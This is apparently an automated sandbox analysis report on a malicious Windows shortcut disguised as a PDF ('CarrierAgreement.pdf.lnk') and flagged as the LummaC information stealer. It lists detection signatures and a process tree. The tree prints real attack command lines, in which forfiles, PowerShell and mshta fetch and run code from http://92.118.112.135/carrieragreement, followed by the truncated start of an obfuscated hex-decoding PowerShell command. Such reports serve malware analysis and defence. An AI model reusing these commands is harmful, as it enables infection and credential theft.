Windows
Analysis Report
CarrierAgreement.pdf.lnk.mal.lnk
Overview
General Information
Detection
LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 7508, cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://92.118.112.135/carrieragreement", MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
- conhost.exe (PID: 7516, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7568, cmdline: . mshta http://92.118.112.135/carrieragreement, MD5: 04029E121A0CFA5991749937DD22A1D9)
- mshta.exe (PID: 7672, cmdline: "C:\Windows\system32\mshta.exe" http://92.118.112.135/carrieragreement, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 7840, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('[long hex-encoded string argument omitted; the command line is cut off at this point in the report]